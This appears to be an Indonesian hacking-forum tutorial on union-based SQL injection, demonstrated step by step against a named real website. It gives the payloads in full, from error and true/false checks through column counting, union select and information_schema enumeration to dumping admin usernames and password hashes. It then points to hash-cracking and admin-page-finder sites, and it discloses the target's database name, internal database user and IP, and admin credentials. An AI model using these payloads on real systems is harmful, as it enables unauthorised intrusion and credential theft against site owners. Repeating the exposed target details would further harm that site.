jangan di ejek yah kalo salah........ Big Grin maklum kerjaan newbie.....
guaa langsung kasih live demonya,, guaa gakk mauu jelasin.... capekk dahh.......
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Aurthor : Edelweize a.k.a Rue a.k.a Advance SQL Injector
Method : Advance SQL Injection
Vuln URL :
http://hrtemps.org/productInfo.php?productID=115%27=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.a Vuln Checking
dengan menambahkan tanda ' [aphostrophie] di akhir URL
Picture Live Demo 1.a Vuln Checking
1.b Vuln Checking [ True And False ]
yaitu dengan +and+1=1 << true, +and+1=2 << false
kalo true,, artikel / produk / apalah,, akan keliatan,, tapi kalo false,, artikel / produk / apalah,, gag akan keliatan.....
Picture Live Demo 1.b Vuln Checking [True]
Picture Live Demo 1.b.a Vuln Checking [ False]
2. Penghitungan Collumn
disini setelah menemukan vulnerebalities di website dan melakukan checking Vuln,, selanjutnya kita akan melakukan Penghitungan Collumn yang gunannya untuk melihat berapa column yang ada di site tsb...
+order+by+[nomer]+--+
skarang guaa kasih contohnya langsung aja yahh.... capekk dahh tinggal di aplod melulu picturenya..
Penghitungan Collumn 1
gag ada errornya tuhh.....
Penghitungan Collumn 2
gag ada juga......
Penghitungan Collumn 3
wadduuhh gag ada juga,....... carii truzz...... Other Mood
langsung jumping aja dahh,, capek..... Big Grin
Penghitungan Collumn 20
wiw,, ada errornya.... Other Mood
tapii belom pasti kalo disitu...
Penghitungan Collumn 19
errornya ada juga.....
Penghitungan Collumn 18
wiw,, gag ada errornya.... Big Grin
hore ketemu columnnya .... Good Mood
jadi columnya ada 18 karna errornya pas di 19...... Big Grin
lannjootttt dahh............... Big Grin
3. Menemukan Vulnerabilities Collumn
disini kita akan mempelajari gimana cara menemukan vulnerabilitie column....
kan pada tahap 2 tadi kita udh menemukan berapa jumlah column yg ada di site itu....
skarang coba dahh kita testing di tabel tsb kalo ada vulnnya.... Big Grin
kata kunci : +union+select+[nomer column]+--+
Live Demo Collumn Vulnerabilities Checking 18
wew....
ada vulnnya......... Big Grin
ada angka 3 yang nongol..... Big Grin
skarang udh dape lubang nya dahh.....
lanjootttt.....................
4. Pengecekan Version, User, Ama Database Website......
setelah mendapatkan vuln column dan angkanya yang nongol.....
skarang kita melakukan checking versi MySQL, user, dan database yang dipakai......
kata kunci : concat(database(),0x3a,user(),0x3a,version())
Q : cara penempatannya gimana..??
A : nih liat,, punya mata kan......
Live Demo Database, User, Version Checking.
database : mbstech_newstore
user :
mbstech_mbstech@172.20.10.17version : 5.0.84-percona-b18-log
nahh,, skarang kan udh dapet versi database ama usernya....
nttuu,, MySQLnya versi 5.... Big Grin
berarti gampang dong nginjeknya.... hehehehhee
kalo versi 4 lebih menjurus pada penebakan.. tapi karna target live demonya berversi 5 jadi belum bisa dijelasin,, pokoknya nanti dahh guaa jelasin kalo ada waktu.....
5. Looking For Table Names, Check This Out..!!
setelah dapetin versi mysqlnya [5] skarng kita akan ingin melihat nama2 tabelnya trus melakukan dumping uname ama passwordnya...... hehehehehe
kata kunci 1 : group_concat(table_name)]
kata kunci 2 : +from+information_schema.tables+--+
tauu cara penempatannya..??
nihh....
Table Names Searching
waduuhh banyak amat...... Bad Mood
mari kita sedikitkan...... hehehehe...... Bad Mood
kata kunci 3 : sama kek kata kunci 1
kata kunci 4 : +from+information_schema.tables+where+table_schema<>0x696e666f726d6174696f6e5f736368656d61+--+
gunanya kata kunci 4 itu untuk mengeluarkan nama2 tabel tanpa memuat tabel informasi....
jadi kita lebih leluasa melihat nama tabel yang mangandung admin.... Big Grin
lanjut.... Big Grin
6. Mengeluarkan Nama Collumn Dari Table
nahh,, setelah kita melihat nama table yang dicurigai mencuri [lho kok mencuri] ekh salah,, mengandung admin.....
kita akan melihat isi collumn tsb utk memastikan bahwa tabel tersebut memang mengandung admin...
kata kunci 1 : group_concat(column_name)
kata kunci 2 : +from+information_schema.columns+where+table_name=0xHEXdariNAMATABEL+--+
skarang sebelum menginject, kita udh menemukan tabel yg keknya mengandung admin....
'admin' (wew.. emang mengandung admin,, namanya aja udh kek gitu)
lalu kata admin kita convert menjadi hex di website ascii converter online ataupun software...
nahh,, ini ascii converter dari t0k3k Miring Crew Forum..
- = [ASCII CONVERTER By Edelweize] = -
selama guaa tauu hex dari admin sih 41646d696e
tapi cobalah test dolo,, mungkin guaa salah kali yah..... hehehehe
7. mengeluarkan isi column
nahh ....
udah mauu abis nihh......... Big Grin
skarang setelah melihat nama column dari table, kita akan mengeluarkan isi column untuk melihat (biasanya sih uname ama pass admin)
langsung aja
kata kunci 1 : concat_ws([isi column])
kata kunci 2 : +from+[namacolumn]+--+
Live Demo Mengeluarkan Isi Column
tuuhh...!!
kalo udah keluar skarang...
kita mengcrack passwordnya.... kenapa..?? karna password itu masih dalam keadaan encrypted...
skarang mari mengcrack..... Big Grin
ini situs2 yang menyediakan fasilitas crack md5...
http://md5crack.com/http://www.victorike.com/tools/8. Mencari Halaman Login Admin
naahh.....
setelah md5 hash telah kita crack sekarang kita harus menemukan halaman login adminnya.....
kalo saya sihh sering pake situs ini untuk nyari halaman login admin...
http://mormoroth.net/af/9. Apakah Yang Akan Dilakukan Selanjutnya...??
iyaaaa.....
setelah menemukan uname ama pass juga admin loginnya,.....
kita tinggal login trus melakukan apa yang harus blackhat lakukan...... Bad Mood
(untung guaa ngga kek mereka, guaa kan newbie... Big Grin)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
End Of Archive
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
btw, yang live demo tadi lohh...... Big Grin
username : admin
password : admin
halaman login admin : carii sendiriii.....!!! Good Mood sdangkan guaa aja gag nemu...... Good Mood
selamat bekerja....